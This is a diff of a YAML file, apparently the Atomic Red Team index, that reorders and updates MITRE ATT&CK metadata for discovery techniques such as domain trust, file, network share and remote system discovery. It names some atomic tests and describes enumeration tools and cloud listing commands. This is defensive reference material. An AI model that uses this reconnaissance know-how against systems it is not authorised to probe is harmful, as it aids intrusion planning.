- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1069.002
atomic_tests:
- name: Basic Permission Groups Discovery Windows (Domain)
@@ -35951,24 +36952,12 @@ discovery:
'
T1482:
technique:
- id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
- description: 'Adversaries may attempt to gather information on domain trust
- relationships that may be used to identify lateral movement opportunities
- in Windows multi-domain/forest environments. Domain trusts provide a mechanism
- for a domain to allow access to resources based on the authentication procedures
- of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users
- of the trusted domain to access resources in the trusting domain. The information
- discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005),
- [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation:
- AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain
- trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call,
- .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
- [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
- to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- name: Domain Trust Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2019-02-14T16:15:05.974Z'
+ modified: '2020-03-26T16:13:21.085Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1482
@@ -35994,12 +36983,24 @@ discovery:
url: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships
description: Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved
February 14, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T16:13:21.085Z'
- created: '2019-02-14T16:15:05.974Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Trust Discovery
+ description: 'Adversaries may attempt to gather information on domain trust
+ relationships that may be used to identify lateral movement opportunities
+ in Windows multi-domain/forest environments. Domain trusts provide a mechanism
+ for a domain to allow access to resources based on the authentication procedures
+ of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users
+ of the trusted domain to access resources in the trusting domain. The information
+ discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005),
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation:
+ AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain
+ trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call,
+ .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
+ [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
+ to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
+ id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
x_mitre_version: '1.1'
x_mitre_permissions_required:
- User
@@ -36111,26 +37112,37 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:27:58.933Z'
created: '2020-02-21T21:08:33.237Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- Office 365 account logs
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1083:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:04.710Z'
+ modified: '2020-03-26T17:18:36.857Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: File and Directory Discovery
+ description: |-
+ Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
external_references:
- source_name: mitre-attack
external_id: T1083
@@ -36139,19 +37151,8 @@ discovery:
description: Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers.
Retrieved February 2, 2016.
source_name: Windows Commands JPCERT
- description: |-
- Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
- name: File and Directory Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:18:36.857Z'
- created: '2017-05-31T21:31:04.710Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_system_requirements:
- Some folders may require Administrator, SYSTEM or specific user depending
on permission levels and access controls
@@ -36281,22 +37282,22 @@ discovery:
phase_name: discovery
modified: '2020-03-20T19:39:59.544Z'
created: '2020-02-21T21:07:55.393Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1087.001
atomic_tests:
- name: Enumerate all accounts (Local)
@@ -36511,22 +37512,22 @@ discovery:
phase_name: discovery
modified: '2020-03-26T17:48:27.871Z'
created: '2020-03-12T19:29:21.013Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery (Local)
@@ -36569,15 +37570,15 @@ discovery:
name: powershell
T1046:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1046
- external_id: T1046
- - external_id: CAPEC-300
- source_name: capec
- url: https://capec.mitre.org/data/definitions/300.html
+ created: '2017-05-31T21:30:43.915Z'
+ modified: '2020-03-11T19:55:53.828Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Service Scanning
description: "Adversaries may attempt to get a listing of services running on
remote hosts, including those that may be vulnerable to remote software exploitation.
Methods to acquire this information include port scans and vulnerability scans
@@ -36586,15 +37587,15 @@ discovery:
Additionally, if the cloud environment is connected to a on-premises environment,
adversaries may be able to identify services running on non-cloud systems
as well."
- name: Network Service Scanning
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-11T19:55:53.828Z'
- created: '2017-05-31T21:30:43.915Z'
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1046
+ external_id: T1046
+ - external_id: CAPEC-300
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/300.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- Windows
@@ -36750,18 +37751,11 @@ discovery:
phase_name: discovery
modified: '2020-03-15T00:59:10.149Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Network protocol analysis
- - Process use of network
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- macOS
- Windows
@@ -36769,11 +37763,18 @@ discovery:
- GCP
- Azure
- Linux
- x_mitre_permissions_required:
- - User
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Network protocol analysis
+ - Process use of network
+ x_mitre_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -36857,15 +37858,16 @@ discovery:
name: powershell
T1040:
technique:
- id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Network Sniffing
- description: |-
- Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
- Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
-
- Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ created: '2017-05-31T21:30:41.399Z'
+ modified: '2020-03-25T21:03:49.610Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1040
@@ -36873,16 +37875,15 @@ discovery:
- external_id: CAPEC-158
source_name: capec
url: https://capec.mitre.org/data/definitions/158.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-25T21:03:49.610Z'
- created: '2017-05-31T21:30:41.399Z'
+ description: |-
+ Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+ Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+
+ Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ name: Network Sniffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
x_mitre_version: '1.1'
x_mitre_data_sources:
- Network device logs
@@ -37010,25 +38011,25 @@ discovery:
phase_name: discovery
modified: '2020-03-26T17:17:42.457Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor processes for tools and command line arguments that
may indicate they're being used for password policy discovery. Correlate that
activity with other suspicious activity from the originating system to reduce
potential false positives from valid user or administrator activity. Adversaries
will likely attempt to find the password policy early in an operation and
the activity is likely to happen with other Discovery activity.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_version: '1.1'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
@@ -37127,6 +38128,12 @@ discovery:
name: bash
T1120:
technique:
+ created: '2017-05-31T21:31:28.471Z'
+ modified: '2020-03-26T17:42:03.337Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
@@ -37145,35 +38152,40 @@ discovery:
name: Peripheral Device Discovery
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:42:03.337Z'
- created: '2017-05-31T21:31:28.471Z'
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ - macOS
x_mitre_data_sources:
- PowerShell logs
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_version: '1.2'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1069:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:55.471Z'
+ modified: '2020-03-26T17:48:28.002Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Permission Groups Discovery
+ description: Adversaries may attempt to find group and permission settings.
+ This information can help adversaries determine which user accounts and groups
+ are available, the membership of users in particular groups, and which users
+ and groups have elevated permissions.
external_references:
- source_name: mitre-attack
external_id: T1069
@@ -37181,19 +38193,8 @@ discovery:
- external_id: CAPEC-576
source_name: capec
url: https://capec.mitre.org/data/definitions/576.html
- description: Adversaries may attempt to find group and permission settings.
- This information can help adversaries determine which user accounts and groups
- are available, the membership of users in particular groups, and which users
- and groups have elevated permissions.
- name: Permission Groups Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:48:28.002Z'
- created: '2017-05-31T21:30:55.471Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -37245,26 +38246,26 @@ discovery:
phase_name: discovery
modified: '2020-03-26T18:05:53.130Z'
created: '2017-05-31T21:30:48.728Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Administrator, SYSTEM may provide better process ownership details
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_system_requirements:
- - Administrator, SYSTEM may provide better process ownership details
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -37328,22 +38329,22 @@ discovery:
phase_name: discovery
modified: '2020-03-26T18:08:20.049Z'
created: '2017-05-31T21:30:25.584Z'
- x_mitre_version: '1.2'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.2'
identifier: T1012
atomic_tests:
- name: Query Registry
@@ -37402,43 +38403,54 @@ discovery:
or /etc/hosts) in order to discover the hostname to IP address
mappings of remote systems. \n\nSpecific to macOS, the bonjour
protocol exists to discover additional Mac-based systems within the same broadcast
- domain. In cloud environments, many typical utilities may be used to discover
- remote systems depending upon the host operating system. In addition, cloud
- environments often provide APIs that serve information about remote systems
- and services."
+ domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote
+ systems include instances and virtual machines in various states, including
+ the running or stopped state. Cloud providers have created methods to serve
+ information about remote systems, such as APIs and CLIs. For example, AWS
+ provides a DescribeInstances API within the Amazon EC2 API and
+ a describe-instances command within the AWS CLI that can return
+ information about all instances within an account.(Citation: Amazon Describe
+ Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud
+ SDK CLI provides the gcloud compute instances list command to
+ list all Google Compute Engine instances in a project, and Azure's CLI az
+ vm list lists details of virtual machines.(Citation: Google Compute
+ Instances)(Citation: Azure VM List)"
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1018
external_id: T1018
+ url: https://attack.mitre.org/techniques/T1018
- external_id: CAPEC-292
source_name: capec
url: https://capec.mitre.org/data/definitions/292.html
+ - source_name: Amazon Describe Instances API
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
+ description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ - source_name: Amazon Describe Instances CLI
+ url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
+ description: Amazon. (n.d.). describe-instances. Retrieved May 26, 2020.
+ - source_name: Google Compute Instances
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
+ description: Google. (n.d.). gcloud compute instances list. Retrieved May
+ 26, 2020.
+ - source_name: Azure VM List
+ url: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
+ description: Microsoft. (n.d.). az vm. Retrieved May 26, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T18:13:00.634Z'
+ modified: '2020-05-26T15:02:19.656Z'
created: '2017-05-31T21:30:28.187Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Process command-line parameters
- x_mitre_detection: "System and network discovery techniques normally occur throughout
- an operation as an adversary learns the environment. Data and events should
- not be viewed in isolation, but as part of a chain of behavior that could
- lead to other activities, such as Lateral Movement, based on the information
- obtained.\n\nNormal, benign system and network events related to legitimate
- remote system discovery may be uncommon, depending on the environment and
- how they are used. Monitor processes and command-line arguments for actions
- that could be taken to gather system and network information. Remote access
- tools with built-in features may interact directly with the Windows API to
- gather information. Information may also be acquired through Windows system
- management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001). "
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_platforms:
- Linux
- macOS
@@ -37446,14 +38458,21 @@ discovery:
- GCP
- Azure
- AWS
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Praetorian
- - RedHuntLabs, @redhuntlabs
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
